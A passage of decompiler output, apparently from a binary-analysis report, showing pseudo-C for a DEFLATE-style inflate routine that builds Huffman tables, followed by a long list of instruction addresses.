                                                                                        												__eflags = __edi - __ecx;
                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                        												if(__edi >= __ecx) {
                                                                                        													__eax = __esi[0x26e8];
                                                                                        													__eax = __esi[0x26e8] - __edi;
                                                                                        													__eflags = __eax;
                                                                                        												} else {
                                                                                        													__ecx = __ecx - __edi;
                                                                                        													__eax = __ecx - __edi - 1;
                                                                                        												}
                                                                                        												__edx = __esi[0x26e8];
                                                                                        												__eflags = __edi - __edx;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												if(__edi == __edx) {
                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                        													__eflags = __ecx - __edx;
                                                                                        													if(__ecx != __edx) {
                                                                                        														__edi = __edx;
                                                                                        														__eflags = __edi - __ecx;
                                                                                        														 *(__ebp - 0x30) = __edi;
                                                                                        														if(__edi >= __ecx) {
                                                                                        															__eax =  *(__ebp - 8);
                                                                                        															__eax =  *(__ebp - 8) - __edi;
                                                                                        															__eflags = __eax;
                                                                                        														} else {
                                                                                        															__ecx = __ecx - __edi;
                                                                                        															__eax = __ecx;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													goto L183;
                                                                                        												} else {
                                                                                        													goto L172;
                                                                                        												}
                                                                                        											}
                                                                                        											L158:
                                                                                        											__eax = __esi[0x26e9];
                                                                                        											__edx =  &(__esi[0x6e8]);
                                                                                        											__eflags = __eax - __edx;
                                                                                        											if(__eax == __edx) {
                                                                                        												goto L163;
                                                                                        											}
                                                                                        											L159:
                                                                                        											__edi = __edx;
                                                                                        											__eflags = __edi - __eax;
                                                                                        											if(__edi >= __eax) {
                                                                                        												__ecx = __ecx - __edi;
                                                                                        												__eflags = __ecx;
                                                                                        												__eax = __ecx;
                                                                                        											} else {
                                                                                        												__eax = __eax - __edi;
                                                                                        												__eax = __eax - 1;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L172;
                                                                                        											} else {
                                                                                        												goto L163;
                                                                                        											}
                                                                                        										case 7:
                                                                                        											L173:
                                                                                        											__eflags = __ebx - 7;
                                                                                        											if(__ebx > 7) {
                                                                                        												__ebx = __ebx - 8;
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                        												_t380 = __ebp - 0x38;
                                                                                        												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                        												__eflags =  *_t380;
                                                                                        											}
                                                                                        											goto L175;
                                                                                        										case 8:
                                                                                        											L4:
                                                                                        											while(_t425 < 3) {
                                                                                        												if( *(_t448 - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												} else {
                                                                                        													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                        													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                        													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                        													_t425 = _t425 + 8;
                                                                                        													continue;
                                                                                        												}
                                                                                        											}
                                                                                        											_t425 = _t425 - 3;
                                                                                        											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                        											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                        											asm("sbb ecx, ecx");
                                                                                        											_t408 = _t406 >> 1;
                                                                                        											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                        											if(_t408 == 0) {
                                                                                        												L24:
                                                                                        												 *_t446 = 9;
                                                                                        												_t436 = _t425 & 0x00000007;
                                                                                        												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                        												_t425 = _t425 - _t436;
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											L6:
                                                                                        											_t411 = _t408 - 1;
                                                                                        											if(_t411 == 0) {
                                                                                        												L13:
                                                                                        												__eflags =  *0x432e90;
                                                                                        												if( *0x432e90 != 0) {
                                                                                        													L22:
                                                                                        													_t412 =  *0x40a5e8; // 0x9
                                                                                        													_t446[4] = _t412;
                                                                                        													_t413 =  *0x40a5ec; // 0x5
                                                                                        													_t446[4] = _t413;
                                                                                        													_t414 =  *0x431d0c; // 0x432610
                                                                                        													_t446[5] = _t414;
                                                                                        													_t415 =  *0x431d08; // 0x432e10
                                                                                        													_t446[6] = _t415;
                                                                                        													L23:
                                                                                        													 *_t446 =  *_t446 & 0x00000000;
                                                                                        													goto L180;
                                                                                        												} else {
                                                                                        													_t26 = _t448 - 8;
                                                                                        													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                        													__eflags =  *_t26;
                                                                                        													_t416 = 0x431d10;
                                                                                        													goto L15;
                                                                                        													L20:
                                                                                        													 *_t416 = _t438;
                                                                                        													_t416 = _t416 + 4;
                                                                                        													__eflags = _t416 - 0x432190;
                                                                                        													if(_t416 < 0x432190) {
                                                                                        														L15:
                                                                                        														__eflags = _t416 - 0x431f4c;
                                                                                        														_t438 = 8;
                                                                                        														if(_t416 > 0x431f4c) {
                                                                                        															__eflags = _t416 - 0x432110;
                                                                                        															if(_t416 >= 0x432110) {
                                                                                        																__eflags = _t416 - 0x432170;
                                                                                        																if(_t416 < 0x432170) {
                                                                                        																	_t438 = 7;
                                                                                        																}
                                                                                        															} else {
                                                                                        																_t438 = 9;
                                                                                        															}
                                                                                        														}
                                                                                        														goto L20;
                                                                                        													} else {
                                                                                        														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                                                        														_push(0x1e);
                                                                                        														_pop(_t440);
                                                                                        														_push(5);
                                                                                        														_pop(_t419);
                                                                                        														memset(0x431d10, _t419, _t440 << 2);
                                                                                        														_t450 = _t450 + 0xc;
                                                                                        														_t442 = 0x431d10 + _t440;
                                                                                        														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                                                        														 *0x432e90 =  *0x432e90 + 1;
                                                                                        														__eflags =  *0x432e90;
                                                                                        														goto L22;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											L7:
                                                                                        											_t423 = _t411 - 1;
                                                                                        											if(_t423 == 0) {
                                                                                        												 *_t446 = 0xb;
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											L8:
                                                                                        											if(_t423 != 1) {
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											goto L9;
                                                                                        										case 9:
                                                                                        											while(1) {
                                                                                        												L27:
                                                                                        												__eflags = __ebx - 0x20;
                                                                                        												if(__ebx >= 0x20) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L25:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												L26:
                                                                                        												__eax =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__ecx = __ebx;
                                                                                        												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L28:
                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                        											__ebx = 0;
                                                                                        											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                        											 *(__ebp - 0x40) = 0;
                                                                                        											__eflags = __eax;
                                                                                        											__esi[1] = __eax;
                                                                                        											if(__eax == 0) {
                                                                                        												goto L53;
                                                                                        											}
                                                                                        											L29:
                                                                                        											_push(0xa);
                                                                                        											_pop(__eax);
                                                                                        											goto L54;
                                                                                        										case 0xa:
                                                                                        											L30:
                                                                                        											__eflags =  *(__ebp - 0x34);
                                                                                        											if( *(__ebp - 0x34) == 0) {
                                                                                        												goto L182;
                                                                                        											}
                                                                                        											L31:
                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												L48:
                                                                                        												__eflags = __eax -  *(__ebp - 0x34);
                                                                                        												if(__eax >=  *(__ebp - 0x34)) {
                                                                                        													__eax =  *(__ebp - 0x34);
                                                                                        												}
                                                                                        												__ecx = __esi[1];
                                                                                        												__eflags = __ecx - __eax;
                                                                                        												__edi = __ecx;
                                                                                        												if(__ecx >= __eax) {
                                                                                        													__edi = __eax;
                                                                                        												}
                                                                                        												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                        												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                        												_t80 =  &(__esi[1]);
                                                                                        												 *_t80 = __esi[1] - __edi;
                                                                                        												__eflags =  *_t80;
                                                                                        												if( *_t80 == 0) {
                                                                                        													L53:
                                                                                        													__eax = __esi[0x145];
                                                                                        													L54:
                                                                                        													 *__esi = __eax;
                                                                                        												}
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											L32:
                                                                                        											__ecx = __esi[0x26e8];
                                                                                        											__edx =  *(__ebp - 0x30);
                                                                                        											__eflags = __edx - __ecx;
                                                                                        											if(__edx != __ecx) {
                                                                                        												L38:
                                                                                        												__esi[0x26ea] = __edx;
                                                                                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                        												__edx = __esi[0x26ea];
                                                                                        												__ecx = __esi[0x26e9];
                                                                                        												__eflags = __edx - __ecx;
                                                                                        												 *(__ebp - 0x30) = __edx;
                                                                                        												if(__edx >= __ecx) {
                                                                                        													__eax = __esi[0x26e8];
                                                                                        													__eax = __esi[0x26e8] - __edx;
                                                                                        													__eflags = __eax;
                                                                                        												} else {
                                                                                        													__ecx = __ecx - __edx;
                                                                                        													__eax = __ecx - __edx - 1;
                                                                                        												}
                                                                                        												__edi = __esi[0x26e8];
                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                        												__eflags = __edx - __edi;
                                                                                        												if(__edx == __edi) {
                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                        													__eflags = __edx - __ecx;
                                                                                        													if(__eflags != 0) {
                                                                                        														 *(__ebp - 0x30) = __edx;
                                                                                        														if(__eflags >= 0) {
                                                                                        															__edi = __edi - __edx;
                                                                                        															__eflags = __edi;
                                                                                        															__eax = __edi;
                                                                                        														} else {
                                                                                        															__ecx = __ecx - __edx;
                                                                                        															__eax = __ecx;
                                                                                        														}
                                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                                        													}
                                                                                        												}
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													goto L183;
                                                                                        												} else {
                                                                                        													goto L48;
                                                                                        												}
                                                                                        											}
                                                                                        											L33:
                                                                                        											__eax = __esi[0x26e9];
                                                                                        											__edi =  &(__esi[0x6e8]);
                                                                                        											__eflags = __eax - __edi;
                                                                                        											if(__eax == __edi) {
                                                                                        												goto L38;
                                                                                        											}
                                                                                        											L34:
                                                                                        											__edx = __edi;
                                                                                        											__eflags = __edx - __eax;
                                                                                        											 *(__ebp - 0x30) = __edx;
                                                                                        											if(__edx >= __eax) {
                                                                                        												__ecx = __ecx - __edx;
                                                                                        												__eflags = __ecx;
                                                                                        												__eax = __ecx;
                                                                                        											} else {
                                                                                        												__eax = __eax - __edx;
                                                                                        												__eax = __eax - 1;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L48;
                                                                                        											} else {
                                                                                        												goto L38;
                                                                                        											}
                                                                                        										case 0xb:
                                                                                        											goto L56;
                                                                                        										case 0xc:
                                                                                        											L60:
                                                                                        											__esi[1] = __esi[1] >> 0xa;
                                                                                        											__eax = (__esi[1] >> 0xa) + 4;
                                                                                        											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                        												goto L68;
                                                                                        											}
                                                                                        											goto L61;
                                                                                        										case 0xd:
                                                                                        											while(1) {
                                                                                        												L93:
                                                                                        												__eax = __esi[1];
                                                                                        												__ecx = __esi[2];
                                                                                        												__edx = __eax;
                                                                                        												__eax = __eax & 0x0000001f;
                                                                                        												__edx = __edx >> 5;
                                                                                        												__eax = __edx + __eax + 0x102;
                                                                                        												__eflags = __esi[2] - __eax;
                                                                                        												if(__esi[2] >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L73:
                                                                                        												__eax = __esi[0x143];
                                                                                        												while(1) {
                                                                                        													L76:
                                                                                        													__eflags = __ebx - __eax;
                                                                                        													if(__ebx >= __eax) {
                                                                                        														break;
                                                                                        													}
                                                                                        													L74:
                                                                                        													__eflags =  *(__ebp - 0x34);
                                                                                        													if( *(__ebp - 0x34) == 0) {
                                                                                        														goto L182;
                                                                                        													}
                                                                                        													L75:
                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                        													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        													__ecx = __ebx;
                                                                                        													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        													__ebx = __ebx + 8;
                                                                                        													__eflags = __ebx;
                                                                                        												}
                                                                                        												L77:
                                                                                        												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                        												__eax = __eax &  *(__ebp - 0x40);
                                                                                        												__ecx = __esi[0x144];
                                                                                        												__eax = __esi[0x144] + __eax * 4;
                                                                                        												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                        												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                        												__eflags = __eax - 0x10;
                                                                                        												 *(__ebp - 0x14) = __eax;
                                                                                        												if(__eax >= 0x10) {
                                                                                        													L79:
                                                                                        													__eflags = __eax - 0x12;
                                                                                        													if(__eax != 0x12) {
                                                                                        														__eax = __eax + 0xfffffff2;
                                                                                        														 *(__ebp - 8) = 3;
                                                                                        													} else {
                                                                                        														_push(7);
                                                                                        														 *(__ebp - 8) = 0xb;
                                                                                        														_pop(__eax);
                                                                                        													}
                                                                                        													while(1) {
                                                                                        														L84:
                                                                                        														__ecx = __eax + __edx;
                                                                                        														__eflags = __ebx - __eax + __edx;
                                                                                        														if(__ebx >= __eax + __edx) {
                                                                                        															break;
                                                                                        														}
                                                                                        														L82:
                                                                                        														__eflags =  *(__ebp - 0x34);
                                                                                        														if( *(__ebp - 0x34) == 0) {
                                                                                        															goto L182;
                                                                                        														}
                                                                                        														L83:
                                                                                        														__ecx =  *(__ebp - 0x38);
                                                                                        														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        														__ecx = __ebx;
                                                                                        														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        														__ebx = __ebx + 8;
                                                                                        														__eflags = __ebx;
                                                                                        													}
                                                                                        													L85:
                                                                                        													__ecx = __edx;
                                                                                        													__ebx = __ebx - __edx;
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        													__ebx = __ebx - __eax;
                                                                                        													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        													__ecx = __eax;
                                                                                        													__eax = __esi[1];
                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        													__ecx = __esi[2];
                                                                                        													__eax = __eax >> 5;
                                                                                        													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                        													__eax = __eax & 0x0000001f;
                                                                                        													__eax = __edi + __eax + 0x102;
                                                                                        													__edi = __edx + __ecx;
                                                                                        													__eflags = __edx + __ecx - __eax;
                                                                                        													if(__edx + __ecx > __eax) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L86:
                                                                                        													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                        													if( *(__ebp - 0x14) != 0x10) {
                                                                                        														L89:
                                                                                        														__edi = 0;
                                                                                        														__eflags = 0;
                                                                                        														L90:
                                                                                        														__eax = __esi + 0xc + __ecx * 4;
                                                                                        														do {
                                                                                        															L91:
                                                                                        															 *__eax = __edi;
                                                                                        															__ecx = __ecx + 1;
                                                                                        															__eax = __eax + 4;
                                                                                        															__edx = __edx - 1;
                                                                                        															__eflags = __edx;
                                                                                        														} while (__edx != 0);
                                                                                        														__esi[2] = __ecx;
                                                                                        														continue;
                                                                                        													}
                                                                                        													L87:
                                                                                        													__eflags = __ecx - 1;
                                                                                        													if(__ecx < 1) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L88:
                                                                                        													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                        													goto L90;
                                                                                        												}
                                                                                        												L78:
                                                                                        												__ecx = __edx;
                                                                                        												__ebx = __ebx - __edx;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        												__ecx = __esi[2];
                                                                                        												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                        												__esi[2] = __esi[2] + 1;
                                                                                        											}
                                                                                        											L94:
                                                                                        											__eax = __esi[1];
                                                                                        											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                        											__edi = __eax;
                                                                                        											__eax = __eax >> 5;
                                                                                        											__edi = __edi & 0x0000001f;
                                                                                        											__ecx = 0x101;
                                                                                        											__eax = __eax & 0x0000001f;
                                                                                        											__edi = __edi + 0x101;
                                                                                        											__eax = __eax + 1;
                                                                                        											__edx = __ebp - 0xc;
                                                                                        											 *(__ebp - 0x14) = __eax;
                                                                                        											 &(__esi[0x148]) = __ebp - 4;
                                                                                        											 *(__ebp - 4) = 9;
                                                                                        											__ebp - 0x18 =  &(__esi[3]);
                                                                                        											 *(__ebp - 0x10) = 6;
                                                                                        											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                        											__eflags =  *(__ebp - 4);
                                                                                        											if( *(__ebp - 4) == 0) {
                                                                                        												__eax = __eax | 0xffffffff;
                                                                                        												__eflags = __eax;
                                                                                        											}
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												goto L9;
                                                                                        											} else {
                                                                                        												L97:
                                                                                        												__ebp - 0xc =  &(__esi[0x148]);
                                                                                        												__ebp - 0x10 = __ebp - 0x1c;
                                                                                        												__eax = __esi + 0xc + __edi * 4;
                                                                                        												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												L98:
                                                                                        												__eax =  *(__ebp - 0x10);
                                                                                        												__eflags =  *(__ebp - 0x10);
                                                                                        												if( *(__ebp - 0x10) != 0) {
                                                                                        													L100:
                                                                                        													__cl =  *(__ebp - 4);
                                                                                        													 *__esi =  *__esi & 0x00000000;
                                                                                        													__eflags =  *__esi;
                                                                                        													__esi[4] = __al;
                                                                                        													__eax =  *(__ebp - 0x18);
                                                                                        													__esi[5] =  *(__ebp - 0x18);
                                                                                        													__eax =  *(__ebp - 0x1c);
                                                                                        													__esi[4] = __cl;
                                                                                        													__esi[6] =  *(__ebp - 0x1c);
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L99:
                                                                                        												__eflags = __edi - 0x101;
                                                                                        												if(__edi > 0x101) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												goto L100;
                                                                                        											}
                                                                                        										case 0xe:
                                                                                        											goto L9;
                                                                                        										case 0xf:
                                                                                        											L175:
                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                        											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                        											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                        											__ecx = __esi[0x26ea];
                                                                                        											__edx = __esi[0x26e9];
                                                                                        											__eflags = __ecx - __edx;
                                                                                        											 *(__ebp - 0x30) = __ecx;
                                                                                        											if(__ecx >= __edx) {
                                                                                        												__eax = __esi[0x26e8];
                                                                                        												__eax = __esi[0x26e8] - __ecx;
                                                                                        												__eflags = __eax;
                                                                                        											} else {
                                                                                        												__edx = __edx - __ecx;
                                                                                        												__eax = __edx - __ecx - 1;
                                                                                        											}
                                                                                        											__eflags = __ecx - __edx;
                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                        											if(__ecx != __edx) {
                                                                                        												L183:
                                                                                        												__edi = 0;
                                                                                        												goto L10;
                                                                                        											} else {
                                                                                        												L179:
                                                                                        												__eax = __esi[0x145];
                                                                                        												__eflags = __eax - 8;
                                                                                        												 *__esi = __eax;
                                                                                        												if(__eax != 8) {
                                                                                        													L184:
                                                                                        													0 = 1;
                                                                                        													goto L10;
                                                                                        												}
                                                                                        												goto L180;
                                                                                        											}
                                                                                        									}
                                                                                        								}
                                                                                        								L181:
                                                                                        								goto L9;
                                                                                        							}
                                                                                        							L70:
                                                                                        							if( *__edi == __eax) {
                                                                                        								goto L72;
                                                                                        							}
                                                                                        							L71:
                                                                                        							__esi[2] = __esi[2] & __eax;
                                                                                        							 *__esi = 0xd;
                                                                                        							goto L93;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L182:
                                                                                        				_t443 = 0;
                                                                                        				_t446[0x147] =  *(_t448 - 0x40);
                                                                                        				_t446[0x146] = _t425;
                                                                                        				( *(_t448 + 8))[1] = 0;
                                                                                        				goto L11;
                                                                                        			}









                                                                                        0x00406d85
                                                                                        0x00406d85
                                                                                        0x00406d85
                                                                                        0x00406d85
                                                                                        0x00406d85
                                                                                        0x00406d89
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406d8f
                                                                                        0x00406d8f
                                                                                        0x00406d92
                                                                                        0x00406d95
                                                                                        0x00406d9a
                                                                                        0x00406d9c
                                                                                        0x00406d9f
                                                                                        0x00406da2
                                                                                        0x00406da5
                                                                                        0x00406da5
                                                                                        0x00406da8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406daa
                                                                                        0x00406daa
                                                                                        0x00406dad
                                                                                        0x00406db2
                                                                                        0x00406db4
                                                                                        0x00406db7
                                                                                        0x00406dbd
                                                                                        0x00406b1c
                                                                                        0x00406b1c
                                                                                        0x00406b1f
                                                                                        0x00406b25
                                                                                        0x00406b2b
                                                                                        0x00406b34
                                                                                        0x00406b3a
                                                                                        0x00406b3d
                                                                                        0x00406b44
                                                                                        0x00406b49
                                                                                        0x00406b4f
                                                                                        0x00406b5a
                                                                                        0x00406b5a
                                                                                        0x00406dc3
                                                                                        0x00406dc3
                                                                                        0x00406dcd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406dd3
                                                                                        0x00406dd3
                                                                                        0x00406dd7
                                                                                        0x00406dda
                                                                                        0x00406dda
                                                                                        0x00406dde
                                                                                        0x00406de4
                                                                                        0x00406de4
                                                                                        0x00406de7
                                                                                        0x00406dea
                                                                                        0x00406df0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406df2
                                                                                        0x00406e14
                                                                                        0x00406e14
                                                                                        0x00406e17
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406df4
                                                                                        0x00406df8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406dfe
                                                                                        0x00406dfe
                                                                                        0x00406e01
                                                                                        0x00406e04
                                                                                        0x00406e09
                                                                                        0x00406e0b
                                                                                        0x00406e0e
                                                                                        0x00406e11
                                                                                        0x00406e11
                                                                                        0x00406e19
                                                                                        0x00406e19
                                                                                        0x00406e1f
                                                                                        0x00406e22
                                                                                        0x00406e25
                                                                                        0x00406e25
                                                                                        0x00406e2c
                                                                                        0x00406e30
                                                                                        0x00406e34
                                                                                        0x00406e37
                                                                                        0x00406e3a
                                                                                        0x00406e40
                                                                                        0x00406e45
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e47
                                                                                        0x00406e5b
                                                                                        0x00406e5b
                                                                                        0x00406e5f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e49
                                                                                        0x00406e4c
                                                                                        0x00406e4c
                                                                                        0x00406e53
                                                                                        0x00406e58
                                                                                        0x00406e58
                                                                                        0x00406e58
                                                                                        0x00406e61
                                                                                        0x00406e61
                                                                                        0x00406e64
                                                                                        0x00406e72
                                                                                        0x00406e78
                                                                                        0x00406e7d
                                                                                        0x00406e83
                                                                                        0x00406e89
                                                                                        0x00406e8f
                                                                                        0x00406e96
                                                                                        0x00406eaa
                                                                                        0x00406eaa
                                                                                        0x00407479
                                                                                        0x00407479
                                                                                        0x00407479
                                                                                        0x0040747e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ab6
                                                                                        0x00406ab6
                                                                                        0x00000000
                                                                                        0x004070b1
                                                                                        0x004070b1
                                                                                        0x004070b5
                                                                                        0x004070b8
                                                                                        0x004070bb
                                                                                        0x004070be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004070c4
                                                                                        0x004070c4
                                                                                        0x004070e9
                                                                                        0x004070e9
                                                                                        0x004070e9
                                                                                        0x004070eb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004070c9
                                                                                        0x004070c9
                                                                                        0x004070cd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004070d3
                                                                                        0x004070d3
                                                                                        0x004070d6
                                                                                        0x004070d9
                                                                                        0x004070dc
                                                                                        0x004070de
                                                                                        0x004070e0
                                                                                        0x004070e3
                                                                                        0x004070e6
                                                                                        0x004070e6
                                                                                        0x004070e6
                                                                                        0x004070ed
                                                                                        0x004070ed
                                                                                        0x004070f5
                                                                                        0x004070f8
                                                                                        0x004070fb
                                                                                        0x004070fe
                                                                                        0x00407102
                                                                                        0x00407105
                                                                                        0x00407107
                                                                                        0x0040710a
                                                                                        0x0040710c
                                                                                        0x00407120
                                                                                        0x00407120
                                                                                        0x00407123
                                                                                        0x0040713d
                                                                                        0x0040713d
                                                                                        0x00407140
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407146
                                                                                        0x00407146
                                                                                        0x00407149
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040714f
                                                                                        0x0040714f
                                                                                        0x00000000
                                                                                        0x0040714f
                                                                                        0x00407125
                                                                                        0x00407128
                                                                                        0x0040712f
                                                                                        0x00407132
                                                                                        0x00000000
                                                                                        0x00407132
                                                                                        0x0040710e
                                                                                        0x00407112
                                                                                        0x00407115
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040715a
                                                                                        0x0040715a
                                                                                        0x0040717f
                                                                                        0x0040717f
                                                                                        0x0040717f
                                                                                        0x00407181
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040715f
                                                                                        0x0040715f
                                                                                        0x00407163
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407169
                                                                                        0x00407169
                                                                                        0x0040716c
                                                                                        0x0040716f
                                                                                        0x00407172
                                                                                        0x00407174
                                                                                        0x00407176
                                                                                        0x00407179
                                                                                        0x0040717c
                                                                                        0x0040717c
                                                                                        0x0040717c
                                                                                        0x00407183
                                                                                        0x0040718b
                                                                                        0x0040718e
                                                                                        0x00407191
                                                                                        0x00407193
                                                                                        0x00407196
                                                                                        0x00407196
                                                                                        0x00407198
                                                                                        0x0040719c
                                                                                        0x0040719f
                                                                                        0x004071a2
                                                                                        0x004071a5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004071ab
                                                                                        0x004071ab
                                                                                        0x004071d0
                                                                                        0x004071d0
                                                                                        0x004071d0
                                                                                        0x004071d2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004071b0
                                                                                        0x004071b0
                                                                                        0x004071b4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004071ba
                                                                                        0x004071ba
                                                                                        0x004071bd
                                                                                        0x004071c0
                                                                                        0x004071c3
                                                                                        0x004071c5
                                                                                        0x004071c7
                                                                                        0x004071ca
                                                                                        0x004071cd
                                                                                        0x004071cd
                                                                                        0x004071cd
                                                                                        0x004071d4
                                                                                        0x004071d4
                                                                                        0x004071dc
                                                                                        0x004071df
                                                                                        0x004071e2
                                                                                        0x004071e5
                                                                                        0x004071e9
